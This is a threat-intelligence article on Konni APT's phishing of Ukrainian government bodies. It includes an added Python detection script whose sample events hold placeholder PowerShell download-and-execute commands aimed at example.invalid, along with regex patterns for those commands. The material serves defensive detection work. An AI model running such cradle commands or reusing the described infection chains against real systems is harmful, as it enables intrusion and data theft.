The North Korean cyber espionage group known as Konni APT has recently initiated a phishing campaign targeting Ukrainian government entities. This development signifies an expansion of the group’s operations beyond its traditional focus on Russia.
According to enterprise security firm Proofpoint, the primary objective of this campaign is to gather intelligence on the progression of Russia’s invasion of Ukraine. Security researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly noted that Konni APT’s interest in Ukraine aligns with its historical pattern of targeting government entities in Russia for strategic intelligence purposes.
Konni APT, also referred to as Opal Sleet, Osmium, TA406, and Vedalia, has been active since at least 2014. The group has a history of targeting entities in South Korea, the United States, and Russia. Their attack strategies often involve phishing emails designed to distribute malware known as Konni RAT (also called UpDog) and to redirect recipients to credential harvesting pages. In a November 2021 analysis, Proofpoint assessed TA406 as one of several actors associated with activities publicly tracked under the names Kimsuky, Thallium, and Konni Group.
In the latest campaign, Konni APT employed phishing emails that impersonated a fictitious senior fellow at a non-existent think tank called the Royal Institute of Strategic Studies. These emails contained links to password-protected RAR archives hosted on the MEGA cloud service. Upon opening the RAR archive using the password provided in the email, the infection sequence commenced, leading to extensive reconnaissance of the compromised systems.
The RAR archive included a Compiled HTML Help (CHM) file displaying decoy content related to former Ukrainian military leader Valeriy Zaluzhnyi. If the recipient clicked anywhere on the page, an embedded PowerShell command executed, reaching out to an external server to download a subsequent PowerShell payload. This payload was capable of executing various commands to gather system information, encode it using Base64, and transmit it back to the same server.
The attackers demonstrated persistence by sending multiple phishing emails on consecutive days when the initial emails did not elicit a response. They followed up with messages inquiring if the target had received the prior emails and encouraged them to download the files.
In another variation of the attack, Konni APT distributed an HTML file directly as an attachment in the phishing emails. Victims were instructed to click on an embedded link within the HTML file, leading to the download of a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file. Executing the LNK file triggered a Base64-encoded PowerShell script that dropped a JavaScript Encoded file named Themes.jse using a Visual Basic Script. This JSE malware contacted an attacker-controlled URL and executed the server’s response via PowerShell. The exact nature of the final payload remains unknown.
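The two infection chains described above (a CHM whose click handler launches PowerShell, and an LNK that runs a Base64-encoded PowerShell script and drops a .jse for the Windows script host) leave distinctive parent/child and command-line patterns in process-creation telemetry. The following detection logic is an added example, not code from Proofpoint or from the article; the event records follow the Sysmon Event ID 1 field layout, and the paths, file names and the example.invalid host are constructed placeholders.

```python
import base64
import ntpath
import re
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  # shared by several records below

def _encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")
# Constructed Sysmon Event ID 1-style records, not real telemetry; paths and hosts are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\decoy.chm'},
    {"ParentImage": r"C:\Windows\hh.exe", "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/stage2"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell.exe -nop -EncodedCommand "
     + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\u\AppData\Roaming\Themes.jse"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell.exe Get-Process"},  # benign
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_HINTS = re.compile(r"downloadstring|downloadfile|webclient|invoke-webrequest|\biex\b|invoke-expression", re.IGNORECASE)
def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand argument, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(evt):
    """Return the names of the detection rules matched by one process-creation event."""
    parent = ntpath.basename(evt["ParentImage"]).lower()
    image = ntpath.basename(evt["Image"]).lower()
    cmd, hits = evt["CommandLine"], []
    if parent == "hh.exe" and image in ("powershell.exe", "pwsh.exe"):  # CHM help viewer spawning PowerShell
        hits.append("chm_spawns_powershell")
    decoded = decode_encoded_command(cmd)
    if decoded is not None and DOWNLOAD_HINTS.search(decoded):  # encoded PowerShell fetching a next stage
        hits.append("encoded_powershell_downloader")
    if image in ("wscript.exe", "cscript.exe") and ".jse" in cmd.lower():  # script host running a .jse
        hits.append("script_host_runs_jse")
    return hits

def scan(events):
    """Map event index -> matched rules for every event that triggered at least one rule."""
    return {i: hits for i, evt in enumerate(events) if (hits := analyze_event(evt))}
```

The benign Get-Process record and the hh.exe launch of the decoy itself stay silent, so the rules key on the chain (help viewer to PowerShell, encoded downloader, script host to .jse) rather than on PowerShell use in general.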
Additionally, TA406 attempted to harvest credentials by sending fake Microsoft security alert messages to Ukrainian government entities from ProtonMail accounts. These messages warned of suspicious sign-in activity from IP addresses located in the United States and urged recipients to verify the login by visiting a provided link. While the credential harvesting page has not been recovered, the same compromised domain has been used in the past to collect Naver login information.
These credential harvesting campaigns occurred prior to the phishing attacks, indicating a coordinated effort to compromise Ukrainian government entities. The Konni APT’s activities underscore the evolving nature of cyber threats and the importance of vigilance against sophisticated phishing campaigns.